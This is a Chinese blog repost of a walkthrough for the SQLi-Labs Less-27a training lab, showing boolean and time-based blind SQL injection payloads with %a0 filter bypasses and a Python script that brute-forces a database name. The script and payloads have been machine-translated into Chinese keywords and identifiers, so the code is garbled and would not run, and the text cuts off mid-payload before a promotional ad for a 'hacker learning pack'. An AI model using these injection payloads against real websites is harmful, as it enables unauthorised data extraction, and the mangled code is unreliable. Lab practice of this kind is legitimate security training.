SQLi LABS Less 27a 联合注入+布尔盲注+时间盲注_sqli mysql布尔盲注

SQLi LABS Less 27a 联合注入+布尔盲注+时间盲注_sqli方式三:时间盲注 一、功能分析
这一关是查询功能,地址栏输入id作为参数,后台根据id查询用户数据,并在前

网址=\’http://8ad7ef14ce564257803e9f3eabade873.app.mituan.zone/Less-27a/\’

# 用于推断长度的有效负载

Payload_len=\’\’\’?id=1\’和%a0

长度(

(数据库())

)={n}

%a0和\’1\’\’

# 用于枚举字符的有效负载

Payload_str=\’\’?id=1\’和%a0

ASCII (

子字符串(

(数据库())

,{l},1)

)={n}

%a0和\’1\’\’

# 获取长度

def getLength(url, 有效负载):

length=1 # 初始测试长度为1

而True:

Response=request.get(url=url+payload_len.format(n=长度))

# 如果页面上存在该内容则表示成功。

如果响应中包含“您的登录名”。文本:

print(\’长度测试完成。长度为:\’, length,)

返回长度;

: 其他

print(\’测试长度:\’,length)

length +=1 # 增加测试长度

# 获取字符

def getStr(url, 负载, 长度):

str=\’\’ #初始表名/库名为空

# 在循环的第一级截取每个字符

: 表示范围(1, 长度+ 1) 内的l

# 循环的第二级枚举了截取该字符的所有可能性。

对于(33, 126): 范围内的n

响应=request.get(url=url+payload_str.format(l=l, n=n))

# print(\’猜猜\’, n)

# 如果页面上存在该内容则表示成功。

如果响应中包含“您的登录名”。文本:

字符串+=字符(n)

print(\’第\’, l, \’成功猜出第\’个字符: \’, str)

休息;

返回一个字符串。

# 开始猜测

长度=getLength(url, Payload_len)

getStr(url,payload_str,长度)

执行结果如下。

对于其他数据库删除操作,只需将下面圆圈中的位置替换为您的SQL语句即可。

常用的库删除语句见方法一末尾。

一、功能分析

第一步是确定注入点

如果我在地址栏中输入“?id=1\’and\’1”,页面显示正常。

如果在地址栏输入“?id=1\’and\’0”,页面异常(空)。

第2 步:确定长度

以您当前的数据库为例,检查数据库名称的长度是否大于1。如果大于1,请在地址栏中键入以下内容:

?id=1\’ 和%a0

如果(

(长度(

(数据库())

)1)

, 睡眠(5), 3)

%a0和\’1

库名称的长度必须大于1,页面延迟为5秒以确保有效负载可用。

从1 开始,依次增加测试长度,然后使用脚本进行确定。

步骤3. 枚举字符

截取库名的第一个字符,将其转换为ASCLL代码,并判断其是否大于1。如果大于1,请在地址栏中键入以下内容:

?id=1\’ 和%0a

如果(

(ASCII(

子字符串(

(数据库())

,1,1)

### 对每个人都有好处

**从零开始**

对于刚接触网络安全的学生,我们创建了详细的学习和成长路线图。这可以说是最科学、最系统的学习路线。每个人都可以遵循这个大方向。

![](https://img-blog.csdnimg.cn/img_convert/95608e9062782d28f4f04f821405d99a.png)

同时,还根据成长路线提供了每个部分的支持视频。

![在此插入图片描述](https://img-blog.csdnimg.cn/direct/a91b9e8100834e9291cfcf1695d8cd42.png#pic_center)

由于篇幅有限,仅包含部分信息。

网络安全面试问题

![](https://img-blog.csdnimg.cn/img_convert/80674985176a4889f7bb130756893764.png)

绿色联盟网络保护行动

![](https://img-blog.csdnimg.cn/img_convert/9f3395407120bb0e1b5bf17bb6b6c743.png)

以及每个人最喜欢的黑客技术

![](https://img-blog.csdnimg.cn/img_convert/5912337446dee53639406fead3d3f03c.jpeg)

**网络安全源码合集+工具包**

![](https://img-blog.csdnimg.cn/img_convert/5072ce807750c7ec721c2501c29cb7d5.png)

![](https://img-blog.csdnimg.cn/img_convert/4a5f4281817dc4613353c120c9543810.png)

**所有信息总计282G**。如果您想要《网络安全入门+黑客进阶学习资源包》全套,可以扫描下面的二维码获取(扫码遇到困难请留言)。评论区获取)~

以上#SQLi LABS Less 27a Joint Injection + Boolean Blind Injection + Time Blind Injection_sqli相关内容来源网络,仅供参考。相关信息请参见官方公告。

原创文章,作者:CSDN,如若转载,请注明出处:https://www.sudun.com/ask/91262.html

(0)
CSDN's avatarCSDN
上一篇 2024年6月21日 下午6:51
下一篇 2024年6月21日 下午6:51

相关推荐

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注